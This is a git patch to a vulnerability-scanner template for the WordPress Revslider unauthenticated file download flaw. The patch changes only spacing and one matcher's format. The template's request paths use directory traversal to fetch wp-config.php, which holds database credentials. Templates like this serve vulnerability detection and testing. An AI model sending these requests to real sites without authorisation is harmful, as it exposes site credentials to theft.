From a8ee7e2ddf95191bf9a64fb203247876444be2fd Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 22 Nov 2021 20:29:59 +0530
Subject: [PATCH] Update wp-revslider-file-download.yaml
---
 vulnerabilities/wp-revslider-file-download.yaml | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/vulnerabilities/wp-revslider-file-download.yaml b/vulnerabilities/wp-revslider-file-download.yaml
index a9511bfb8b..123db8de3a 100644
--- a/vulnerabilities/wp-revslider-file-download.yaml
+++ b/vulnerabilities/wp-revslider-file-download.yaml
@@ -1,4 +1,6 @@
 id: wp-revslider-file-download
+
+
 info:
 name: Wordpress Revslider - Unauthenticated Arbitrary File Download
 author: pussycat0x
@@ -10,11 +12,15 @@ info:
 - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
 - https://cxsecurity.com/issue/WLB-2021090129
 tags: wordpress,wp-plugin,lfi
+
+
 requests:
 - method: GET
 path:
 - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
 - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+
+
 matchers-condition: and
 matchers:
 - type: word
@@ -25,4 +31,4 @@ requests:
 condition: and
 - type: status
 status:
- 200
\ No newline at end of file
+ - 200